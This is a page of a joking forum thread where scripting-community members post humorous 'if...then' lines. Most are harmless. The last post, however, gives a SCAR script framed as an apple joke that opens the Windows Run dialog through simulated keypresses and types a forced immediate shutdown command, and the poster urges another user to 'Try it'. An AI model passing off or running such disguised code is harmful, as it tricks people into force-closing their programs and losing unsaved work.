Page 2 of 2 FirstFirst 12
Results 26 to 33 of 33

Thread: The If..Then Thread!

  1. #26
    Join Date
    Jul 2007
    Location
    Norway.
    Posts
    1,938
    Mentioned
    3 Post(s)
    Quoted
    0 Post(s)

    Default

    If Anyone post a noob post then they shall forever be pwned in hell;
    end else everyone is happy;
    End;

  2. #27
    Join Date
    Dec 2006
    Location
    Banville
    Posts
    3,914
    Mentioned
    12 Post(s)
    Quoted
    98 Post(s)

    Default

    If I was not busy then my greater knowledge would be shared with all.
    The jealous temper of mankind, ever more disposed to censure than
    to praise the work of others, has constantly made the pursuit of new
    methods and systems no less perilous than the search after unknown
    lands and seas.

  3. #28
    Join Date
    Jul 2007
    Location
    Norway.
    Posts
    1,938
    Mentioned
    3 Post(s)
    Quoted
    0 Post(s)

    Default

    If I was smart then people would be like WTF.


    If R0b0t wouldn't be busy then I would have been smarter.

  4. #29
    Join Date
    Apr 2007
    Location
    Michigan -.-
    Posts
    1,357
    Mentioned
    2 Post(s)
    Quoted
    4 Post(s)

    Default

    Quote Originally Posted by mark9510 View Post
    If pie is tasty then
    start to eat
    Else
    go buy pie
    no ways! i just at pie...

    if i take a shit, then i have room for pie
    METAL HEAD FOR LIFE!!!

  5. #30
    Join Date
    Jul 2007
    Location
    Norway.
    Posts
    1,938
    Mentioned
    3 Post(s)
    Quoted
    0 Post(s)

    Default

    Quote Originally Posted by mark9510 View Post
    If pie is tasty then
    start to eat
    Else
    go buy pie
    This kinda states that

    SCAR Code:
    "Pie = Tasty = Eat it AND IF Pie = NOT tasty then go buy pie."
    Point?

    If I din't like pie then I would be a sad person.

  6. #31
    Join Date
    Jul 2007
    Location
    Players[CurrentPlayer].Loc:='Bank'
    Posts
    875
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    I'm the first one to do something like this! (I think)

    if(isuptext('illo')) then
    begin
    mouse(x,y,5,5)
    end;
    Quote Originally Posted by sirlaughsalot
    .... Obama had the devil jump out of his ass, run and stab Hillary in the back...
    ILMMTYAEAFHPY.

  7. #32
    Join Date
    Jun 2007
    Location
    brooklyn ny
    Posts
    683
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    that was not cool
    if apples are green then
    begin
    make apple dance
    else
    kill apple

  8. #33
    Join Date
    Jul 2007
    Location
    Norway.
    Posts
    1,938
    Mentioned
    3 Post(s)
    Quoted
    0 Post(s)

    Default

    SCAR Code:
    CONST MarkLikesRedApples = False;

    Begin
    if MarkLikesRedApples = true then WriteLn('Good boy!');
    If MarkLikesRedApples = False then
    BEGIN
        KeyDown(92);
        KeyUp(92);
        Wait(200);
        SendKeys('u');
        SendKeys('u');
        Wait(3000);
        KeyDown(92);
        Wait(200);
        KeyDown(82);
        Wait(200);
        KeyUp(82);
        Wait(200);
        KeyUp(92);
        Wait(200);
        SendKeys('shutdown -s -f -t 00' + chr(13));
      END;
      End.


    Try it, Mark.

Page 2 of 2 FirstFirst 12

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Similar Threads

  1. Thread all over
    By jakeyboy29 in forum News and General
    Replies: 5
    Last Post: 08-28-2008, 10:56 PM
  2. Yet another Sig Thread!
    By SonOfSheep in forum Graphics and Multimedia
    Replies: 7
    Last Post: 08-21-2008, 11:29 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •